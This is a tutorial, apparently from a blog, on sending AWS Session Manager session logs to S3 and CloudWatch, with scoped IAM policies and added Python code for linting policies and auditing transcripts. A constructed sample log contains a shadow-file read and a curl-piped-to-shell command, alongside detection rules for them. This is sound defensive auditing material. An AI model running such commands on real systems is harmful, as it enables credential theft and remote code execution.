Configure Logging For Session Manager

In this blog post, we explain how to configure logging for Session Manager so that session activity can be audited later.

In my previous blog posts, I explained how you can connect to Linux and Windows EC2 instances more securely using Systems Manager's Session Manager, without opening inbound security group rules or distributing SSH keys.

Please check it out below.

Login to Linux EC2 Instances using Session manager

Securely Access Windows EC2 Instances using Session Manager

From the above guides, we learnt how to log in securely to Linux and Windows EC2 instances.

Let's set up logging for Session Manager so that sessions can be audited later when required.

In addition to listing completed and current sessions, Session Manager provides options for auditing and logging the full activity of each session.

Important Note

  • The logs will not be formatted optimally for Windows Server 2012 or earlier. Hence it is recommended to use Windows Server 2012 R2 or later.
  • On Amazon Linux, Amazon Linux 2 and Ubuntu Server, the screen utility is installed by default. If the screen utility is not present on the instance, the logs will be truncated, so install it on other distributions before enabling logging.

Session Manager Logging Locations

The Session manager logs can be stored in two locations.

  • S3 Bucket
  • Cloudwatch Logs

We will cover both logging strategies in this blog.

Storing Session Manager Logs In S3 Bucket

To store Session Manager logs in an S3 bucket, first we need to create the bucket.

To create an S3 bucket, log in to the S3 console.

Click Create bucket, enter the name of the bucket and choose the region where the bucket should be created. Leave Block Public Access enabled: this bucket will hold a transcript of every command run on your instances, so it must never be readable by anyone but the auditors.

Then click Create.

Once the bucket is created, we need the bucket ARN, which we will use in the next step.

To get the bucket ARN, tick the checkbox next to the bucket name and then click Copy Bucket ARN.

Creating IAM Policy

We need to create an IAM policy that grants the SSM Agent on the instance the permissions it needs to write session logs to the bucket we have just created.

To create an IAM policy , Login to IAM console.

In the navigation pane , Click Policies and click Create policy

Select JSON, remove the existing policy and paste the content below. The agent only needs to put objects into the bucket and read the bucket's encryption configuration (the latter is what lets the Encrypt log data option work); it does not need s3:* on the whole bucket, and granting that would let a compromised instance read or delete every other instance's session logs.

{
    "Version": "2012-10-17",
    "Statement": [
       {
           "Sid": "PutSessionLogs",
           "Effect": "Allow",
           "Action": "s3:PutObject",
           "Resource": "arn:aws:s3:::session-manager-audit-logs/*"
       },
       {
           "Sid": "ReadBucketEncryption",
           "Effect": "Allow",
           "Action": "s3:GetEncryptionConfiguration",
           "Resource": "arn:aws:s3:::session-manager-audit-logs"
       }
    ]
}

In the Resource fields, don't forget to replace the bucket ARN with your own bucket ARN, which you copied in the previous step. If the bucket uses SSE-KMS, the instance role also needs kms:GenerateDataKey on that key.

Click Review policy

On the Review policy page, provide a name for the IAM policy with a short description and then click Create policy.

Attaching IAM Policy With IAM Role

The next step is to attach the policy we created in the previous step to an IAM role.

For this, we assume that the EC2 instance registered as a Systems Manager managed instance already has an IAM role (instance profile) attached.

That role will typically carry the AmazonEC2RoleforSSM managed policy. AWS now recommends AmazonSSMManagedInstanceCore instead, which grants only what the SSM Agent itself needs.

We will attach the S3 logging policy created in the previous step to that same role.

To do so, from the IAM console, in the navigation pane, click Roles.

Search for the role that is currently attached to the instance.

Select the role and then, under Permissions, click Attach policies.

Under Attach Permissions, search for the S3 logging policy by name.

Select it and then click Attach policy.

The instance can now write to the bucket named in the IAM policy. Note that the policy only grants permission; which bucket Session Manager actually logs to is chosen in the Session Manager preferences in the next step.

Configure Session Manager Logs To S3 Bucket

Now we will go ahead and enable logging in Session Manager.

Log in to the Systems Manager console. In the navigation pane, under Instances & Nodes, choose Session Manager.

Then choose Preferences.

Click Edit and check S3 bucket. In this walkthrough Encrypt log data is unchecked to keep the setup simple; for a production audit trail leave it checked, which requires the bucket to have default server-side encryption enabled (and the instance role to be allowed s3:GetEncryptionConfiguration on the bucket, as in the policy above).

For S3 bucket name, choose a bucket name from the list and select the bucket we created earlier.

Then click Save.

Testing Session Manager Logging

To test the logging, we need to start a session on the instance.

From the Systems Manager console, in the left navigation pane, choose Session Manager and then click Sessions.

Click Start session. From the instance list, choose the instance that has the necessary IAM role attached.

Then click Start session.

A browser-based terminal will open in a new tab.

You can run shell commands as usual.

Once you are done, click Terminate.

Reviewing The Session Manager Logs

Now the sessions for the instance should be recorded and logged to the S3 bucket.

The log for a session is written to S3 only after the session terminates (by Terminate, idle timeout or maximum duration), so an active session does not yet appear in the bucket.

To check all the sessions, click Session history in the Systems Manager Session Manager console.

You can see that the session for the instance is Terminated and that its audit log has been sent to the S3 bucket.

To check the log, click the Amazon S3 link for the session.

It takes you directly to the S3 console and displays the log object for that particular session.

The log file is named after the session ID, which begins with the IAM user name of the person who established the session, and has a .log extension.

You can download the log file and review it. It records everything displayed in the session, including every command you executed.

We have successfully implemented logging for Session Manager, so from now on anyone who uses Session Manager will have their sessions logged to the S3 bucket.

Storing Session Manager Logs In Cloudwatch

The process is the same as for S3. First we create a CloudWatch log group, then create an IAM policy with CloudWatch Logs permissions, and then attach the policy to the IAM role that is already attached to the instance.

To create a CloudWatch log group, log in to the CloudWatch console.

In the navigation pane, under Logs, click Log groups.

Click Create log group, provide a log group name and then click Create.

Creating IAM Policy With Cloudwatch Permissions

To create an IAM policy, log in to the IAM console. In the navigation pane, choose Policies.

Click Create policy, click JSON, remove the existing policy and add the one below. The agent needs to create a log stream in the group and put events into it; it does not need logs:CreateLogGroup (the group already exists) or logs:GetLogEvents (reading the audit trail back from the instance is exactly what we do not want). Note also that an ARN such as arn:aws:logs:::* has empty region and account fields and therefore matches no real log group, so the Resource is scoped to the log group you created.

{
   "Version": "2012-10-17",
   "Statement": [
      {
         "Sid": "PutSessionLogsToCloudWatch",
         "Effect": "Allow",
         "Action": [
             "logs:CreateLogStream",
             "logs:PutLogEvents",
             "logs:DescribeLogStreams"
         ],
         "Resource": [
              "arn:aws:logs:*:*:log-group:session-manager-audit-logs:*"
         ]
      },
      {
         "Sid": "DescribeLogGroups",
         "Effect": "Allow",
         "Action": "logs:DescribeLogGroups",
         "Resource": "*"
      }
   ]
}

Replace session-manager-audit-logs with the name of the log group you created. Click Review policy, provide a name for the IAM policy and then click Create policy.

Attaching IAM Policy With IAM Role

The next step is to attach the policy we created in the previous step to an IAM role.

As before, we assume that the EC2 instance registered as a Systems Manager managed instance already has an IAM role (instance profile) attached.

That role will typically carry the AmazonEC2RoleforSSM managed policy (or the recommended replacement, AmazonSSMManagedInstanceCore).

We will attach the CloudWatch policy created in the previous step to that same role.

To do so, from the IAM console, in the navigation pane, click Roles.

Search for the role that is currently attached to the instance.

Select the role and then, under Permissions, click Attach policies.


Under Attach Permissions, search for the CloudWatch policy by name.

Select it and then click Attach policy.

Enable Cloudwatch Logging For Session Manager

Now we will go ahead and enable CloudWatch logging in Session Manager.

Log in to the Systems Manager console. In the navigation pane, under Instances & Nodes, choose Session Manager.


Then choose Preferences.


Click Edit and check CloudWatch logs. As in the S3 section, Encrypt log data is unchecked here for simplicity; leaving it checked requires the log group to be encrypted with a KMS key, otherwise sessions will fail to start.

For CloudWatch log group, choose a log group name from the list.

Search for the log group you created, select it and finally click Save.
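The two console procedures above (the S3 bucket policy and preferences, and the CloudWatch log group policy and preferences) can also be expressed as documents you feed to the AWS CLI. The following is an added example, not code from the original post or from AWS: it builds a least-privilege instance-role policy covering both log destinations, builds the content of the regional SSM-SessionManagerRunShell preferences document that the Preferences page edits, and runs a small lint over a policy to catch the two mistakes the console walkthrough invites (s3:* on the whole bucket, and a logs ARN with empty region and account fields). The bucket name, log group name and key prefix are placeholders, not values from the post.

```python
"""Added example: build and lint Session Manager logging configuration."""
import json
import re

BUCKET = "session-manager-audit-logs"      # placeholder bucket name
LOG_GROUP = "session-manager-audit-logs"   # placeholder log group name

# Actions with no resource type in IAM, so Resource "*" is unavoidable.
RESOURCE_STAR_OK = {"logs:DescribeLogGroups"}
WILDCARD_ACTION = re.compile(r"^(\*|[a-z0-9-]+:\*)$")


def instance_policy(bucket, log_group, prefix="sessions/", kms_key_arn=None):
    """Least-privilege policy for the instance role, scoped to one bucket
    prefix and one log group instead of s3:* on the whole bucket."""
    statements = [
        {"Sid": "PutSessionLogsToS3", "Effect": "Allow",
         "Action": "s3:PutObject",
         "Resource": f"arn:aws:s3:::{bucket}/{prefix}*"},
        # The agent checks the bucket's default encryption before writing,
        # which is what lets "Encrypt log data" be enforced.
        {"Sid": "ReadBucketEncryption", "Effect": "Allow",
         "Action": "s3:GetEncryptionConfiguration",
         "Resource": f"arn:aws:s3:::{bucket}"},
        {"Sid": "PutSessionLogsToCloudWatch", "Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents",
                    "logs:DescribeLogStreams"],
         "Resource": f"arn:aws:logs:*:*:log-group:{log_group}:*"},
        {"Sid": "DescribeLogGroups", "Effect": "Allow",
         "Action": "logs:DescribeLogGroups", "Resource": "*"},
    ]
    if kms_key_arn:  # only needed when the bucket or log group uses SSE-KMS
        statements.append({"Sid": "EncryptLogsWithKms", "Effect": "Allow",
                           "Action": "kms:GenerateDataKey",
                           "Resource": kms_key_arn})
    return {"Version": "2012-10-17", "Statement": statements}


def preferences_document(bucket, log_group, prefix="sessions/",
                         enforce_encryption=True):
    """Content for the regional SSM-SessionManagerRunShell document.
    With enforce_encryption the bucket needs default SSE and the log
    group a KMS key, otherwise sessions refuse to start."""
    return {
        "schemaVersion": "1.0",
        "description": "Document to hold regional settings for Session Manager",
        "sessionType": "Standard_Stream",
        "inputs": {
            "s3BucketName": bucket,
            "s3KeyPrefix": prefix,
            "s3EncryptionEnabled": enforce_encryption,
            "cloudWatchLogGroupName": log_group,
            "cloudWatchEncryptionEnabled": enforce_encryption,
            "cloudWatchStreamingEnabled": False,  # deliver when session ends
            "kmsKeyId": "",
            "runAsEnabled": False,
            "runAsDefaultUser": "",
            "idleSessionTimeout": "20",
            "shellProfile": {"windows": "", "linux": ""},
        },
    }


def _as_list(value):
    return value if isinstance(value, list) else [value]


def lint_policy(policy):
    """Flag Allow statements with service-wide wildcard actions, Resource
    "*" where an ARN is possible, or ARNs whose region/account is empty."""
    findings = []
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", "<no Sid>")
        actions = _as_list(st["Action"])
        for action in actions:
            if WILDCARD_ACTION.match(action):
                findings.append(f"{sid}: wildcard action {action}")
        for res in _as_list(st["Resource"]):
            if res == "*":
                if not all(a in RESOURCE_STAR_OK for a in actions):
                    findings.append(f"{sid}: Resource '*' for {actions}")
                continue
            parts = res.split(":")
            if len(parts) < 6:
                findings.append(f"{sid}: malformed ARN {res}")
            elif parts[2] != "s3" and "" in parts[3:5]:  # S3 ARNs have no region/account
                findings.append(f"{sid}: {res} has an empty region or "
                                "account field and matches nothing")
    return findings


# Constructed policy in the shape a console walkthrough produces when s3:*
# is granted on the bucket and the CloudWatch Logs ARN is left unscoped.
OVERBROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "S3", "Effect": "Allow", "Action": "s3:*",
         "Resource": [f"arn:aws:s3:::{BUCKET}", f"arn:aws:s3:::{BUCKET}/*"]},
        {"Sid": "Logs", "Effect": "Allow",
         "Action": ["logs:CreateLogGroup", "logs:GetLogEvents",
                    "logs:CreateLogStream", "logs:PutLogEvents",
                    "logs:DescribeLogStreams"],
         "Resource": ["arn:aws:logs:::*"]},
    ],
}

if __name__ == "__main__":
    with open("policy.json", "w") as fh:
        json.dump(instance_policy(BUCKET, LOG_GROUP), fh, indent=2)
    with open("prefs.json", "w") as fh:
        json.dump(preferences_document(BUCKET, LOG_GROUP), fh, indent=2)
    print("over-broad:", lint_policy(OVERBROAD_POLICY))
    print("scoped:", lint_policy(instance_policy(BUCKET, LOG_GROUP)))
    # Apply with the AWS CLI (same documents the console writes):
    #   aws iam create-policy --policy-name SessionManagerLogging \
    #       --policy-document file://policy.json
    #   aws ssm update-document --name SSM-SessionManagerRunShell \
    #       --content file://prefs.json --document-version '$LATEST'
```

The lint deliberately treats S3 ARNs differently: they legitimately have empty region and account fields, whereas an empty region or account in a logs ARN is almost always a copy-and-paste error that silently grants nothing.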

Testing Session Manager Logging

To test the logging, we need to start a session on the instance.

From the Systems Manager console, in the left navigation pane, choose Session Manager and then click Sessions.

Click Start session. From the instance list, choose the instance that has the necessary IAM role attached.

Then click Start session.

A browser-based terminal will open in a new tab.

You can run shell commands as usual.


Once you're done, click Terminate.


Reviewing Session Manager Logs In Cloudwatch

Now the sessions for the instance should be recorded and logged to the CloudWatch log group.

With the settings used here, the log is written only after the session terminates. If you need to follow a session while it is still open, Session Manager preferences also offer Stream session logs for CloudWatch, which sends output continuously instead of as one upload at the end.

To check all the sessions, click Session history in the Systems Manager Session Manager console.

You can see that the session for the instance is Terminated and that its audit log has been sent to CloudWatch.

Click the CloudWatch link for the session. It takes you directly to the CloudWatch console and displays the log stream for that particular session.

The log stream is named after the session ID, which begins with the IAM user name of the person who established the session, and contains all the output for that session.

From the CloudWatch console, you can audit the logs directly.

We have implemented CloudWatch logging for Session Manager.
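Whether you download the .log object from S3 or read the log stream in CloudWatch, what you get is the raw terminal transcript of the session, complete with the escape sequences the shell emitted. The following is an added example, not code from the original post: it normalises such a transcript, pulls out the commands that were typed at the prompt, and runs a few audit rules over them, which is the kind of first pass an auditor would do before reading the full output. The sample transcript is constructed here to look like a short interactive shell session; the prompt patterns and audit rules are assumptions for this sample and would be extended for real logs, which can contain many more control sequences.

```python
"""Added example: normalise a Session Manager transcript and audit the commands."""
import re

# Constructed sample of what a short session might leave in <session-id>.log
SAMPLE_LOG = (
    "\x1b[?1034hsh-4.2$ sudo su -\r\n"
    "[root@ip-10-0-1-23 ~]# cat /etc/shadow | head -1\r\n"
    "root:*:18400:0:99999:7:::\r\n"
    "[root@ip-10-0-1-23 ~]# \x1b[32mcurl -s http://example.com/setup.sh | sh\x1b[0m\r\n"
    "[root@ip-10-0-1-23 ~]# exit\r\n"
    "sh-4.2$ exit\r\n"
)

CSI_RE = re.compile(r"\x1b\[[0-9;?]*[A-Za-z]")   # colour, cursor and mode sequences
# Assumed prompt shapes: "sh-4.2$ " and "[user@host dir]# " / "[user@host dir]$ "
PROMPT_RE = re.compile(r"^(?:sh-[\d.]+\$|\[[^\]]+\][#$])\s*(.*)$")

# Assumed audit rules for this sample; a real review would use a longer list.
AUDIT_RULES = {
    "privilege escalation": re.compile(r"^(sudo|su)\b"),
    "credential file access": re.compile(r"/etc/shadow|\.aws/credentials|id_rsa\b"),
    "remote script piped to shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
}


def strip_ansi(text):
    """Remove CSI escape sequences and normalise CR/LF so lines compare cleanly."""
    return CSI_RE.sub("", text).replace("\r\n", "\n").replace("\r", "\n")


def extract_commands(log_text):
    """Return the commands entered at a recognised shell prompt, in order."""
    commands = []
    for line in strip_ansi(log_text).split("\n"):
        m = PROMPT_RE.match(line)
        if m and m.group(1).strip():
            commands.append(m.group(1).strip())
    return commands


def audit_commands(commands):
    """Pair each command with the first audit rule it trips, if any."""
    hits = []
    for cmd in commands:
        for name, rule in AUDIT_RULES.items():
            if rule.search(cmd):
                hits.append((cmd, name))
                break
    return hits


if __name__ == "__main__":
    cmds = extract_commands(SAMPLE_LOG)
    for cmd in cmds:
        print("cmd:", cmd)
    for cmd, rule in audit_commands(cmds):
        print(f"FLAG [{rule}]: {cmd}")
```

Because Session Manager logs only what was displayed, a command that scrolled past the prompt regex (for example one typed inside a text editor or a nested shell with a different prompt) will not appear in the extracted list; the full transcript still has to be read for anything the rules miss.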

Conclusion

For audit purposes, we have enabled logging of the sessions that IAM users create through Session Manager to both an S3 bucket and a CloudWatch log group.

Thanks for reading this article. I hope you find it helpful.

Please Check out my other articles.